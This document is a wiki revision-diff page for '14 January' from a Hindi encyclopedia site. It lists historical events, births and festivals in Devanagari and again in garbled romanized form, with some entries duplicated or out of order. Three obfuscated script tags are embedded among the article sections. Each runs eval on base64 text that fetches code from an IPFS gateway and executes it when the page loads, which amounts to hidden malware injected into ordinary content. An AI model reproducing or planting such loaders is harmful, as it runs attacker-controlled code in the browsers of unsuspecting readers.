Difference between revisions of "14 जनवरी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
(13 intermediate revisions by 6 users not shown)
Line 5: Line 5:
 
==14 जनवरी की महत्त्वपूर्ण घटनाएँ==
 
==14 जनवरी की महत्त्वपूर्ण घटनाएँ==
 
* 1514 - पोप लियो एक्स ने दासता के विरुद्ध आदेश पारित किया।
 
* 1514 - पोप लियो एक्स ने दासता के विरुद्ध आदेश पारित किया।
 +
* 1641 - यूनाइटेड ईस्ट इंडिया कंपनी ने मलक्का शहर पर विजय प्राप्त की।
 +
* 1659 - एलवास के युद्ध में [[पुर्तग़ाल]] ने स्पेन को पराजित किया।
 
* 1758 - [[ईस्ट इंडिया कंपनी]] को [[भारत]] में लड़ाई में जीती हुई संपत्ति अपने पास रखने का अधिकार [[इंग्लैंड]] नरेश ने दिया।
 
* 1758 - [[ईस्ट इंडिया कंपनी]] को [[भारत]] में लड़ाई में जीती हुई संपत्ति अपने पास रखने का अधिकार [[इंग्लैंड]] नरेश ने दिया।
 +
** इंग्लैंड के सम्राट के एक अधिकार पत्र के तहत ईस्ट इंडिया कंपनी को भारत में कंपनी या सम्राट के खिलाफ किसी भी युद्ध में लूटे गये धन एवं सम्पत्ति को रखने का अधिकार मिला।
 
* 1760 - [[फ्रांसीसी]] जनरल लेली ने [[पांडिचेरी]] [[अंग्रेज़|अंग्रेज़ों]] के हवाले कर दिया।
 
* 1760 - [[फ्रांसीसी]] जनरल लेली ने [[पांडिचेरी]] [[अंग्रेज़|अंग्रेज़ों]] के हवाले कर दिया।
 
* 1761 ‌- [[पानीपत युद्ध तृतीय|पानीपत की तीसरी लड़ाई]] मराठों और [[अहमदशाह अब्दाली]] के बीच हुई।
 
* 1761 ‌- [[पानीपत युद्ध तृतीय|पानीपत की तीसरी लड़ाई]] मराठों और [[अहमदशाह अब्दाली]] के बीच हुई।
 
** [[भारत]] में [[मराठा]] शासकों और [[अहमदशाह दुर्रानी]] के बीच [[पानीपत युद्ध तृतीय|पानीपत का तीसरा युद्ध]] हुआ।
 
** [[भारत]] में [[मराठा]] शासकों और [[अहमदशाह दुर्रानी]] के बीच [[पानीपत युद्ध तृतीय|पानीपत का तीसरा युद्ध]] हुआ।
 
* 1784 - [[अमरीका]] ने [[ब्रिटेन]] के साथ शांति संधि की पुष्टि की।
 
* 1784 - [[अमरीका]] ने [[ब्रिटेन]] के साथ शांति संधि की पुष्टि की।
* 1809 - [[इंग्लैंड]] और स्पेन ने 'नेपोलियन बोनापार्ट' के ख़िलाफ गठबंधन किया।
+
* 1809 - [[इंग्लैंड]] और स्पेन ने 'नेपोलियन बोनापार्ट' के ख़िलाफ़ गठबंधन किया।
 
* [[1858]] - नेपोलियन तृतीय की हत्या की साजिश का भंडाफोड़ हुआ।
 
* [[1858]] - नेपोलियन तृतीय की हत्या की साजिश का भंडाफोड़ हुआ।
* [[1867]] - पेरू ने स्पेन के ख़िलाफ जंग का ऐलान किया।
+
* [[1867]] - पेरू ने स्पेन के ख़िलाफ़ जंग का ऐलान किया।
 
* [[1907]] - जमैका में भूकंप से किंगस्टन शहर तबाह हो गया और एक हज़ार से अधिक लोग मारे गये।
 
* [[1907]] - जमैका में भूकंप से किंगस्टन शहर तबाह हो गया और एक हज़ार से अधिक लोग मारे गये।
 
** जमायका में आये भूकम्प में क़रीब 1000 लोगों की मौत हो गई।
 
** जमायका में आये भूकम्प में क़रीब 1000 लोगों की मौत हो गई।
 +
* [[1912]] - रेमंड पोंकारे [[फ्रांस]] के [[प्रधानमंत्री]] बने।
 
* [[1918]] - [[फ्रांस]] के पूर्व प्रधानमंत्री जोसेफ कैलाक्स को देशद्रोह के आरोप में गिरफ़्तार किया गया।
 
* [[1918]] - [[फ्रांस]] के पूर्व प्रधानमंत्री जोसेफ कैलाक्स को देशद्रोह के आरोप में गिरफ़्तार किया गया।
 
* [[1950]] - [[ईरान]] में मुहम्मद सईद ने सरकार का गठन किया।
 
* [[1950]] - [[ईरान]] में मुहम्मद सईद ने सरकार का गठन किया।
Line 20: Line 24:
 
* [[1962]] - अल्जीरिया के शहरों में आतंकवादी हमलों में 6 लोग मारे गये।
 
* [[1962]] - अल्जीरिया के शहरों में आतंकवादी हमलों में 6 लोग मारे गये।
 
* [[1966]] - इंडोनेशिया ने राष्ट्रसंघ स्थित अपना मिशन बंद कर दिया।
 
* [[1966]] - इंडोनेशिया ने राष्ट्रसंघ स्थित अपना मिशन बंद कर दिया।
* [[1986]] - ग्वाटेमाला में विनिसियों केरजो 6 वर्षों में पहले असैनिक राष्ट्रपति बने।
+
** भारत के दक्षिणी राज्य मद्रास का नाम बदलकर [[तमिलनाडु]] किया गया।
 +
* [[1974]] - विश्व फुटबाल लीग की स्थापना की गयी।
 +
* [[1975]] - सोवियत संघ ने [[अमेरिका]] के साथ व्यापार समझौते को समाप्त किया।
 +
* [[1986]] - [[ग्वाटेमाला]] में विनिसियों केरजो 6 वर्षों में पहले असैनिक राष्ट्रपति बने।
 
* [[1982]] - [[इंदिरा गाँधी|श्रीमती इंदिरा गाँधी]] ने 20सूत्री कार्यक्रम की घोषणा की।
 
* [[1982]] - [[इंदिरा गाँधी|श्रीमती इंदिरा गाँधी]] ने 20सूत्री कार्यक्रम की घोषणा की।
 
* [[1985]] - हुन सेन कंबोडिया के प्रधानमंत्री निर्वाचित।  
 
* [[1985]] - हुन सेन कंबोडिया के प्रधानमंत्री निर्वाचित।  
 +
* [[1986]] - मध्य अमेरिकी देश [[ग्वाटेमाला]] में संविधान लागू हुआ।
 
* [[1989]] - [[इलाहबाद]] में बारह [[वर्ष]] बाद [[कुम्भ मेला|कुम्भ का मेला]] प्रारम्भ हुआ।
 
* [[1989]] - [[इलाहबाद]] में बारह [[वर्ष]] बाद [[कुम्भ मेला|कुम्भ का मेला]] प्रारम्भ हुआ।
 
* [[1992]] -  
 
* [[1992]] -  
Line 43: Line 51:
 
**फ़्रांस के मुख्य विपक्षी दल ने यूरोपीय संघ के पहले राष्ट्रपति पद के लिए पूर्व ब्रिटिश प्रधानमंत्री टोनी ब्लेयर के नाम के प्रस्ताव को खारिज किया।  
 
**फ़्रांस के मुख्य विपक्षी दल ने यूरोपीय संघ के पहले राष्ट्रपति पद के लिए पूर्व ब्रिटिश प्रधानमंत्री टोनी ब्लेयर के नाम के प्रस्ताव को खारिज किया।  
 
* [[2009]] - सरकार ने विदेशी पत्रों के फेसीमाइल (प्रति) संस्करणों से शत-प्रतिशत विदेशी निवेश को मंज़ूरी देने की घोषणा की।
 
* [[2009]] - सरकार ने विदेशी पत्रों के फेसीमाइल (प्रति) संस्करणों से शत-प्रतिशत विदेशी निवेश को मंज़ूरी देने की घोषणा की।
 +
* [[2017]]-  [[बिहार]] के [[पटना]] में [[गंगा नदी]] में नाव डूबने से कम से कम 24 लोगों की मृत्यु।
  
 
==14 जनवरी को जन्मे व्यक्ति==
 
==14 जनवरी को जन्मे व्यक्ति==
* 1551 - [[अबुल फ़ज़ल]]- [[मुग़ल काल]] में [[अकबर]] के नवरत्नों में से एक।
+
* 1551 - [[मुग़ल काल]] में [[अकबर]] के नवरत्नों में से एक [[अबुल फ़जल]]।
* 1804 - मशहूर संगीतकार जॉन पार्क का जन्म हुआ।
+
* [[1977]] - [[नारायण कार्तिकेयन]] - [[भारत]] के एकमात्र फ़ॉरमूला वन चालक।
* [[1977]] - नारायण कार्तिकेयन- [[भारत]] के एकमात्र फ़ॉरमूला वन चालक।
 
 
* [[1967]] - [[अमेरिका|अमेरिकी]] [[अभिनेत्री]] एमिली वॉटसन का जन्म हुआ।
 
* [[1967]] - [[अमेरिका|अमेरिकी]] [[अभिनेत्री]] एमिली वॉटसन का जन्म हुआ।
 +
* [[1942]] - [[योगेश कुमार सभरवाल]] - [[भारत]] के [[सर्वोच्च न्यायालय]] के 36वें भूतपूर्व मुख्य न्यायाधीश।
 +
*[[1926]] - [[महाश्वेता देवी]] - भारत की सामाजिक कार्यकर्ता और लेखिका।
 +
* [[1918]] - [[सुधाताई जोशी]] - [[पुर्तग़ाल|पुर्तग़ाली]] साम्राज्यवादियों से गोवा की मुक्ति के [[स्वतंत्रता संग्राम]] की प्रमुख नेता थीं।
 +
* [[1905]] - [[दुर्गा खोटे]],  [[हिन्दी]] व [[मराठी भाषा|मराठी]] फ़िल्मों की प्रसिद्ध [[अभिनेत्री]]।
 
* [[1896]] - [[सी. डी. देशमुख]], [[ब्रिटिश शासन]] के अधीन आई.सी.एस. अधिकारी और स्वतंत्रता के बाद [[भारत]] के तीसरे वित्त मंत्री।
 
* [[1896]] - [[सी. डी. देशमुख]], [[ब्रिटिश शासन]] के अधीन आई.सी.एस. अधिकारी और स्वतंत्रता के बाद [[भारत]] के तीसरे वित्त मंत्री।
 +
* [[1886]] - [[मंगूराम]] - समाज सुधारक थे।
 +
* 1804 - मशहूर संगीतकार जॉन पार्क का जन्म हुआ।
 +
* 1551 - [[अबुल फ़ज़ल]]- [[मुग़ल काल]] में [[अकबर]] के नवरत्नों में से एक।
  
 
==14 जनवरी को हुए निधन==
 
==14 जनवरी को हुए निधन==
 +
*1742- [[एडमंड हैली]], एक प्रसिद्घ खगोलशास्त्री।
  
 
==14 जनवरी के महत्त्वपूर्ण अवसर एवं उत्सव==
 
==14 जनवरी के महत्त्वपूर्ण अवसर एवं उत्सव==
 
* [[मकर संक्रांति]]
 
* [[मकर संक्रांति]]
* अंतर्राष्ट्रीय फ़िल्म समारोह दिवस (10 दिवसीय)
+
* अंतर्राष्ट्रीय फ़िल्म समारोह दिवस (10 दिवसीय)
 +
* [[राष्ट्रीय सड़क सुरक्षा सप्ताह]]
 
==बाहरी कड़ियाँ==
 
==बाहरी कड़ियाँ==
 
{{कैलंडर बाहरी कड़ियाँ}}
 
{{कैलंडर बाहरी कड़ियाँ}}

Revision as of 11:23, 26 March 2018

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

gregori kailandar ke anusar 14 janavari varsh ka 14 vaan din hai. sal mean abhi aur 351 din shesh haian. (lip varsh mean 352 din)

14 janavari ki mahattvapoorn ghatanaean

  • 1514 - pop liyo eks ne dasata ke viruddh adesh parit kiya.
  • 1641 - yoonaited eest iandiya kanpani ne malakka shahar par vijay prapt ki.
  • 1659 - elavas ke yuddh mean purtagal ne spen ko parajit kiya.
  • 1758 - eest iandiya kanpani ko bharat mean l daee mean jiti huee sanpatti apane pas rakhane ka adhikar ianglaiand naresh ne diya.
    • ianglaiand ke samrat ke ek adhikar patr ke tahat eest iandiya kanpani ko bharat mean kanpani ya samrat ke khilaph kisi bhi yuddh mean loote gaye dhan evan sampatti ko rakhane ka adhikar mila.
  • 1760 - phraansisi janaral leli ne paandicheri aangrezoan ke havale kar diya.
  • 1761 ‌- panipat ki tisari l daee marathoan aur ahamadashah abdali ke bich huee.
  • 1784 - amarika ne briten ke sath shaanti sandhi ki pushti ki.
  • 1809 - ianglaiand aur spen ne 'nepoliyan bonapart' ke khilaf gathabandhan kiya.
  • 1858 - nepoliyan tritiy ki hatya ki sajish ka bhandapho d hua.
  • 1867 - peroo ne spen ke khilaf jang ka ailan kiya.
  • 1907 - jamaika mean bhookanp se kiangastan shahar tabah ho gaya aur ek hazar se adhik log mare gaye.
    • jamayaka mean aye bhookamp mean qarib 1000 logoan ki maut ho gee.
  • 1912 - remand poankare phraans ke pradhanamantri bane.
  • 1918 - phraans ke poorv pradhanamantri joseph kailaks ko deshadroh ke arop mean giraftar kiya gaya.
  • 1950 - eeran mean muhammad seed ne sarakar ka gathan kiya.
  • 1954 - jagadaguru kripalu maharaj ne 7 dinoan tak 500 hindoo vidvanoan ke samaksh bhashan diya. unhean paanchavaan jagadaguru chuna gaya.
  • 1962 - aljiriya ke shaharoan mean atankavadi hamaloan mean 6 log mare gaye.
  • 1966 - iandoneshiya ne rashtrasangh sthit apana mishan band kar diya.
    • bharat ke dakshini rajy madras ka nam badalakar tamilanadu kiya gaya.
  • 1974 - vishv phutabal lig ki sthapana ki gayi.
  • 1975 - soviyat sangh ne amerika ke sath vyapar samajhaute ko samapt kiya.
  • 1986 - gvatemala mean vinisiyoan kerajo 6 varshoan mean pahale asainik rashtrapati bane.
  • 1982 - shrimati iandira gaandhi ne 20sootri karyakram ki ghoshana ki.
  • 1985 - hun sen kanbodiya ke pradhanamantri nirvachit.
  • 1986 - madhy ameriki desh gvatemala mean sanvidhan lagoo hua.
  • 1989 - ilahabad mean barah varsh bad kumbh ka mela prarambh hua.
  • 1992 -
    • izarayal ne jardan ke sath shaantivarta shuroo ki.
    • paulaiand ke ek jahaz ke baltik sagar mean doob jane se 54 log mare gaye.
  • 1994 - yookren, roos tatha sanyukt rajy amerika dvara masko mean paramanu astr kam karane sambandhi samajhaute par hastakshar.
  • 1998 - pakistan mean ek afagan kargo jahaz ke durghatanagrast hone se qarib 50 logoan ki maut ho gee.
  • 1999 -
    • bharat ka pahala atyadhunik 'havaee yatayat parisar', dilli rashtr ko samarpit kiya gaya.
    • bulant isevit turki ke naye pradhanamantri niyukt.
  • 2000 - kampyootar badashah bil gets ne stiv valmar ko vishv ki sabase b di kampyootar saftaveyar kampani sauanpi.
  • 2001 - al salvador mean bhookamp, 234 log mare gaye, maich fiksiang ke prakaran mean bharatiy satoriya sanjiv chavala landan mean giraftar v jamanat par riha.
  • 2002 -
    • bharat ke rakshamantri jarj pharnaandiz ne kaha ki atankavad ki samapti ke bad hi sena sima se hategi.
    • atankavad ke khilaf sangharsh mean chin bharat ke sath, nyooyark mean rakshamantri jarj farnaandis ne atankavad ki samapti se pahale sima se bharatiy senaean hatane se inkar kiya.
  • 2005 - jammoo - kashmir mean do muthabhe doan mean paanch atankavadi mare gaye.
  • 2007 - nepal mean aantarim sanvidhan ko manjoori mili.
  • 2008 -
    • uttar pradesh shasan ki nivida moolyaankan kameti ne jepi samooh ko ek hazar kimi lambi 'ganga eksapres ve yojana' ka kam sauanpane ki sanstriti ki.
    • fraans ke mukhy vipakshi dal ne yooropiy sangh ke pahale rashtrapati pad ke lie poorv british pradhanamantri toni bleyar ke nam ke prastav ko kharij kiya.
  • 2009 - sarakar ne videshi patroan ke phesimail (prati) sanskaranoan se shat-pratishat videshi nivesh ko manzoori dene ki ghoshana ki.
  • 2017- bihar ke patana mean ganga nadi mean nav doobane se kam se kam 24 logoan ki mrityu.

14 janavari ko janme vyakti

14 janavari ko hue nidhan

14 janavari ke mahattvapoorn avasar evan utsav

bahari k diyaan

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>